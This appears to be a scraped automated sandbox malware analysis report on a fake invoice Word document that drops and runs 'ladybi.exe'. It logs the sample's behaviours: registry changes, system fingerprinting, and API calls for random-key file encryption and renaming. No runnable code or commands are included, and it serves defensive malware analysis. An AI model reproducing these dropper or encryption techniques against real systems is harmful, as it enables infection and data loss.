Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Process information set: NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Process information set: NOGPFAULTERRORBOX and NOOPENFILEERRORBOX

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Registry key monitored for changes: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer

Stores large binary data to the registry

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Key value created or modified: HKEY_USERS\Software\Microsoft\Office\11.0\Word\Data Settings

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_004014FF GetFileAttributesExW,GetLastError,SetFileAttributesW,CloseHandle,MoveFileExW,GetLastError,CloseHandle,CreateFileW,CloseHandle,CryptGenRandom,GetLastError,CryptEncrypt,GetLastError,GetSystemTimeAsFileTime,CloseHandle,SetFileAttributesW,CloseHandle,GetLastError,

3_2_004014FF

Contains functionality to query the account / user name

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

3_1_00405D1F

Contains functionality to query windows version

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_00402FE5 DsRoleGetPrimaryDomainInformation,DsRoleFreeMemory,GetVersionExA,KiUserCallbackDispatcher,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsWow64Process,

3_2_00402FE5

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: GetUserDefaultUILanguage,GetLocaleInfoA,

3_2_00405F5B

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Queries volume information: C:\invoice_J-98148270.doc VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE	Queries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Classification

Analysis Advice

Signature Overview

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Protection of GUI:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Software Vulnerablities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot